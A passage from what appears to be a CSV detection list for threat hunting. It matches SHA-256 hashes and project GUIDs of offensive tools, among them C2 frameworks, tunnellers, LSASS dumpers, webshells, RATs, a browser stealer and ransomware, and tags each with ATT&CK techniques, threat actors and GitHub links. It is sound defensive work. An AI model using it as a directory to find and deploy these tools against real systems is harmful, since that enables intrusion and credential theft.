tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","#filehash","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","21284" "*08a34b6f8df04ceec420e252fc484ac46a7f384a0c470e7abe4f1dc89762f067*",".{0,1000}08a34b6f8df04ceec420e252fc484ac46a7f384a0c470e7abe4f1dc89762f067.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21285" "*08a715b0223935b1810024cb32618d84942aebbd10360407b571734ca93749db*",".{0,1000}08a715b0223935b1810024cb32618d84942aebbd10360407b571734ca93749db.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows 
(RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","21286" "*08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57*",".{0,1000}08AEC00F\-42ED\-4E62\-AE8D\-0BFCE30A3F57.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#GUIDproject","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","21287" "*08b75b7485c6cfd8be9f0820b14fc6b449a4dae683286a2aab0c0bd21ef35707*",".{0,1000}08b75b7485c6cfd8be9f0820b14fc6b449a4dae683286a2aab0c0bd21ef35707.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21288" "*08bb37b35346a2fc5bcc4c56ed101a95072de5bf7b5af36273d1277807c43a3e*",".{0,1000}08bb37b35346a2fc5bcc4c56ed101a95072de5bf7b5af36273d1277807c43a3e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21289" "*08bdf0baeae215d62da086a06124b26d50d1f77ab021c17a849084648daa7d35*",".{0,1000}08bdf0baeae215d62da086a06124b26d50d1f77ab021c17a849084648daa7d35.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21291" "*08bec0a0da412feaad0cd339162179c50edd5bc75a0fa1d25fa95c00f2437f85*",".{0,1000}08bec0a0da412feaad0cd339162179c50edd5bc75a0fa1d25fa95c00f2437f85.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","21292" "*08bf766742ad601442e6200717c9a5ca004de85c350353dd2793b5c29e1db995*",".{0,1000}08bf766742ad601442e6200717c9a5ca004de85c350353dd2793b5c29e1db995.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21293" "*08c4e8f76bbf766917611b1d53774ff6ac69edd31aff71ab5c344d59f606c4e9*",".{0,1000}08c4e8f76bbf766917611b1d53774ff6ac69edd31aff71ab5c344d59f606c4e9.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","21294" "*08ca5b5dae3c18f7a5bed317a0650f8f015207facf43ec829b9a3cf7fa63ffa2*",".{0,1000}08ca5b5dae3c18f7a5bed317a0650f8f015207facf43ec829b9a3cf7fa63ffa2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21295" "*08cebde6781422f271581951ff6db23b9eedd4a0be0949551c0da85c6de8cb72*",".{0,1000}08cebde6781422f271581951ff6db23b9eedd4a0be0949551c0da85c6de8cb72.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. 
A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#filehash","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","21297" "*08d43f94bbdc5f8b1ec034b09c6d2536d50dd92f9132e61c4ec85a716487c6ba*",".{0,1000}08d43f94bbdc5f8b1ec034b09c6d2536d50dd92f9132e61c4ec85a716487c6ba.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","21298" "*08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D*",".{0,1000}08DBC2BF\-E9F3\-4AE4\-B0CC\-6E9C8767982D.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#GUIDproject","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","21299" "*08e4c0ff7e4631b54fc848a95a15be134089e2422cc173f96ae11ee3e803d95d*",".{0,1000}08e4c0ff7e4631b54fc848a95a15be134089e2422cc173f96ae11ee3e803d95d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21302" 
"*08ec751857b68b0501f0d810f45f9020e6afb307ec536c139a1801e95d870be8*",".{0,1000}08ec751857b68b0501f0d810f45f9020e6afb307ec536c139a1801e95d870be8.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","21303" "*08eca2f2424877b698312c5aa652d016398dbc0d811326202cddeedfaa8700b5*",".{0,1000}08eca2f2424877b698312c5aa652d016398dbc0d811326202cddeedfaa8700b5.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21304" "*08f0007bf2c941bb9372682e9cdcc21e59369b6038c70a7a20a7d3507abaa86d*",".{0,1000}08f0007bf2c941bb9372682e9cdcc21e59369b6038c70a7a20a7d3507abaa86d.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#filehash","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","21307" "*08f1f067fdfc22fd7075eb73a2cdec749cf0052ccd0672954617b7e49eb1ca40*",".{0,1000}08f1f067fdfc22fd7075eb73a2cdec749cf0052ccd0672954617b7e49eb1ca40.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. 
HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","21308" "*0901aac4feb3ef12677e64599acc30daf72ab2e3227ab46db8b06a6e8a5c2070*",".{0,1000}0901aac4feb3ef12677e64599acc30daf72ab2e3227ab46db8b06a6e8a5c2070.{0,1000}","offensive_tool_keyword","subbrute","A DNS meta-query spider that enumerates DNS records and subdomains.","T1071.001 - T1083 - T1590.001","TA0043 - TA0007?","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/TheRook/subbrute","1","0","#filehash","N/A","5","10","3422","661","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z","21311" "*0904cc6e027548759b2b2f917e20202a02b86bab3ec33cf01c5d4d8064eec584*",".{0,1000}0904cc6e027548759b2b2f917e20202a02b86bab3ec33cf01c5d4d8064eec584.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","21312" "*090600985a1db310b138b87ad8eb42f1db810379974a790a30c9cc8d55e81c17*",".{0,1000}090600985a1db310b138b87ad8eb42f1db810379974a790a30c9cc8d55e81c17.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21313" "*09086d1efecc096e7418987b2a4733595afd2bdcf1d1073a53bc7f4eba4e8833*",".{0,1000}09086d1efecc096e7418987b2a4733595afd2bdcf1d1073a53bc7f4eba4e8833.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","21314" "*0908e1cfbd62968eea9ae9a3c772b6f134770c72b503affde0d551c8a55447c5*",".{0,1000}0908e1cfbd62968eea9ae9a3c772b6f134770c72b503affde0d551c8a55447c5.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","Dispossessor - Scattered 
Spider*","C2","https://github.com/b23r0/rsocx","1","0","#filehash","N/A","10","10","381","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z","21315" "*09104e5185bde84d4d5043b07bf067e190fa541ed07dfe23a8374adab15f1969*",".{0,1000}09104e5185bde84d4d5043b07bf067e190fa541ed07dfe23a8374adab15f1969.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","21317" "*092ac8a6ca4a373a9788724e2b89c69785312fc7d7d10af083a3b480a58178b2*",".{0,1000}092ac8a6ca4a373a9788724e2b89c69785312fc7d7d10af083a3b480a58178b2.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21322" "*09323E4D-BE0F-452A-9CA8-B07D2CFA9804*",".{0,1000}09323E4D\-BE0F\-452A\-9CA8\-B07D2CFA9804.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","#GUIDproject","N/A","10","3","289","48","2025-03-11T04:49:55Z","2022-05-26T19:34:59Z","21323" "*09348db398b0f762f8bf72cc8fd76268833be266918c177c82bdb05e28c79c47*",".{0,1000}09348db398b0f762f8bf72cc8fd76268833be266918c177c82bdb05e28c79c47.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","21325" 
"*09387bf7e4ca97704227fb00618e4056be0852acd1885841da239162457542d4*",".{0,1000}09387bf7e4ca97704227fb00618e4056be0852acd1885841da239162457542d4.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21326" "*09407d2e3ac7d6af13c407d17ec8e51b6d1b1d8271df65ebd0b3ffbab420b2fe*",".{0,1000}09407d2e3ac7d6af13c407d17ec8e51b6d1b1d8271df65ebd0b3ffbab420b2fe.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","#filehash","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","21327" "*09480a5f53d380fcec0fd43f60435c4d6ad9d3decca9cfa419614353f1557a48*",".{0,1000}09480a5f53d380fcec0fd43f60435c4d6ad9d3decca9cfa419614353f1557a48.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1059 - T1547 - T1068 - T1562 - T1110 - T1083 - T1021 - T1071","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","0","#filehash","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","21328" "*0950b4561ed9e9dce2ce89ee2cd3e4c740700c399c6b8006afb1c9419569a1a7*",".{0,1000}0950b4561ed9e9dce2ce89ee2cd3e4c740700c399c6b8006afb1c9419569a1a7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21330" "*0953f449b99d30bbf1f38beb8e820b996c29ab9b756867bf54819a58b020c05b*",".{0,1000}0953f449b99d30bbf1f38beb8e820b996c29ab9b756867bf54819a58b020c05b.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","21332" "*0954c8a613c18097f0086265db97e819d44346d52752c8d760a90e5bc6888f98*",".{0,1000}0954c8a613c18097f0086265db97e819d44346d52752c8d760a90e5bc6888f98.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","21333" "*0956efa9072a03fddbe779da42e60df115e9d71bf9ac846ade8b751e4530b084*",".{0,1000}0956efa9072a03fddbe779da42e60df115e9d71bf9ac846ade8b751e4530b084.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21334" "*095a6fc6a2c9647417df017fa70b182abcc68b97a8addd4e25cf302f6f2e98e4*",".{0,1000}095a6fc6a2c9647417df017fa70b182abcc68b97a8addd4e25cf302f6f2e98e4.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in 
C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","#filehash","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","21335" "*0968703e426943707b405b5c5bb0ca14ce2e21c8f125954d8ab26c808f45dc47*",".{0,1000}0968703e426943707b405b5c5bb0ca14ce2e21c8f125954d8ab26c808f45dc47.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21340" "*0971A047-A45A-43F4-B7D8-16AC1114B524*",".{0,1000}0971A047\-A45A\-43F4\-B7D8\-16AC1114B524.{0,1000}","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","0","#GUIDproject","N/A","10","5","421","53","2025-01-04T14:16:46Z","2022-02-15T20:51:46Z","21341" "*0971aee212257aba1a537747e492b76aff0020623edb68defd378e8ed069f6a8*",".{0,1000}0971aee212257aba1a537747e492b76aff0020623edb68defd378e8ed069f6a8.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","#filehash","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","21342" "*097480e794bb20660bd64c5fd4814d9aac0135710b28a85ca643422041773dc6*",".{0,1000}097480e794bb20660bd64c5fd4814d9aac0135710b28a85ca643422041773dc6.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21343" "*097549cf7d0f76f0d99edf8b2d91c60977fd6a96e4b8c3c94b0b1733dc026d3e*",".{0,1000}097549cf7d0f76f0d99edf8b2d91c60977fd6a96e4b8c3c94b0b1733dc026d3e.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://www.microsoft.com/en-us/security/blog/2021/03/02/hafnium-targeting-exchange-servers/","1","0","#filehash","webshell used with proxylogon exploitation","10","10","N/A","N/A","N/A","N/A","21344" "*09764c124174dfc424e00b57c8464025dc6bbfcae62e709bf505a7eece480173*",".{0,1000}09764c124174dfc424e00b57c8464025dc6bbfcae62e709bf505a7eece480173.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21345" "*0976936c3c02be348ea926ce86c7204c7e9e59a092477e924c1a1d5bd97cfced*",".{0,1000}0976936c3c02be348ea926ce86c7204c7e9e59a092477e924c1a1d5bd97cfced.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21346" "*097a7a15058a4623f758a7667857145abe680a97c61255e2aa8f6086ee4fe365*",".{0,1000}097a7a15058a4623f758a7667857145abe680a97c61255e2aa8f6086ee4fe365.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","21347" "*09855e8685bbec09962affefbfad2c554d434a87aca1e1ac8c961f5ebfe6cdad*",".{0,1000}09855e8685bbec09962affefbfad2c554d434a87aca1e1ac8c961f5ebfe6cdad.{0,1000}","offensive_tool_keyword","ASPJinjaObfuscator","Heavily obfuscated ASP web shell generation tool.","T1100 - T1027","TA0003 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/fin3ss3g0d/ASPJinjaObfuscator","1","0","#filehash","N/A","8","2","160","21","2024-04-26T01:27:42Z","2024-04-23T01:01:53Z","21349" "*09877a6147033fd5a670e8828058d51d71926e684e53582bff7d5c27b6f9501e*",".{0,1000}09877a6147033fd5a670e8828058d51d71926e684e53582bff7d5c27b6f9501e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21350" "*0988d2c24c478d4918d1aebd99817d7d84d0a6997fffed713fada3338636b62a*",".{0,1000}0988d2c24c478d4918d1aebd99817d7d84d0a6997fffed713fada3338636b62a.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense Evasion","https://github.com/KDot227/SomalifuscatorV2","1","0","#filehash","N/A","10","4","315","42","2025-01-19T04:30:49Z","2022-09-23T00:46:51Z","21351" "*099923b629ff4309a579a66eaa857de4e5d5caa093b6226ee7c491742d9168e9*",".{0,1000}099923b629ff4309a579a66eaa857de4e5d5caa093b6226ee7c491742d9168e9.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#filehash","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","21352" 
"*0999e7ec2eaa95fded99e6b8cb3ffd5ae372a896731cef3eb5bdb0b8977e64f4*",".{0,1000}0999e7ec2eaa95fded99e6b8cb3ffd5ae372a896731cef3eb5bdb0b8977e64f4.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21353" "*0999ff434753baea877027af71dc4f7ed5866e3647f19d9707063e3a0a7b61f2*",".{0,1000}0999ff434753baea877027af71dc4f7ed5866e3647f19d9707063e3a0a7b61f2.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","21354" 